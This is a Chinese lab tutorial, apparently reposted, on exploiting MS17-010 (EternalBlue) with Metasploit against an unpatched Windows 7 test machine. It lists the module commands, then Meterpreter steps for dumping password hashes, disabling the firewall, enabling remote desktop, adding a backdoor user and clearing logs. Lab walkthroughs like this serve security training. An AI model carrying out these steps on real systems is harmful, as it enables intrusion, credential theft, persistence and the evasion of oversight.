kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

kail利⽤msf⼯具对ms17-010(永恒之蓝)漏洞⼊侵渗透Win7 kail利⽤msf⼯具对ms17-010(永恒之蓝)漏洞⼊侵渗透Win7
前⾔:
提到操作系统漏洞,⼤家肯定听说过⽿熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry病毒的诞⽣。
该病毒是不法分⼦利⽤NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进⾏传播 。病毒肆虐,俨然是⼀场全球性互联⽹灾难,给⼴⼤电脑⽤户造成了巨⼤损失。最新统计数据显⽰,100多个国家和地区超过10万台电脑遭到了病毒攻击、感染。 病毒是⾃熊猫烧⾹以来影响⼒最⼤的病毒之⼀。
实验环境:
⼯具:metasploit
靶机两台:windows 7sp1和kali2020
攻击机IP地址:192.168.29.131
被攻击机IP地址:192.168.29.128
实验条件:两台机⼦可以互通的,并且windows 7sp1(⽆补丁)开启了445端⼝,防⽕墙是关闭的。
步骤:
1、在kali⾥⾯打开metasploit漏洞利⽤框架
2、搜索ms17-010漏洞利⽤模块 search 17-010
到exploit/windows/smb/ms17_010_eternalblue
其中exploit具有攻击性,auxliary是⽤来验证的。
3、使⽤利⽤模块use+exploit/windows/smb/ms17_010_eternalblue
4、查看配置项 show options
5、设置 靶机IP地址(RHOST),攻击机IP地址(LHOST)
再次查看配置项
6、实施攻击exploit/run
7、攻⼊⽬标主机
Meterpreter 是 Metasploit 的⼀个扩展模块,可以调⽤ Metasploit 的⼀些功能,对⽬标系统进⾏更深⼊的渗透,如获取屏幕、上传/下载⽂件、创建持久后门等。
在攻击进去的情况下演⽰⼏个功能
1、查看⽬标主机的操作系统信息(sysinfo)
2、对⽬标主机的屏幕进⾏截图(截图保存在/root下)
3、查看⽬标主机所有的⽤户名和密码(密码显⽰为hash值)
4、获取shell页⾯
乱码解决⽅法:
输⼊chcp 65001可将乱码解决
5、关闭防⽕墙
msinfo
6、关闭Telnet服务
7、⽤两种⽅法开启远程桌⾯服务,并查看远程桌⾯功能启⽤情况(1)⽅法1:run  getgui  -e
(2)⽅法2:run post/windows/manage/enable_rdp
到windows7sp1上查看远程桌⾯功能启⽤情况
8、创建系统⽤户(创建⽤户名为:test,密码为:123456)
9、清除⽇志
使⽤VNC payload远程操控⽬标电脑
1,输⼊Background,返回退出meterpreter界⾯
2,查看set payload 参数(输⼊set payload 按两下 TAB键 )

本文发布于:2024-09-23 21:26:25,感谢您对本站的认可!

本文链接:https://www.17tex.com/tex/3/380573.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:漏洞   病毒   远程   电脑   攻击   创建   IP地址   查看
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2024 Comsenz Inc.Powered by © 易纺专利技术学习网 豫ICP备2022007602号 豫公网安备41160202000603 站长QQ:729038198 关于我们 投诉建议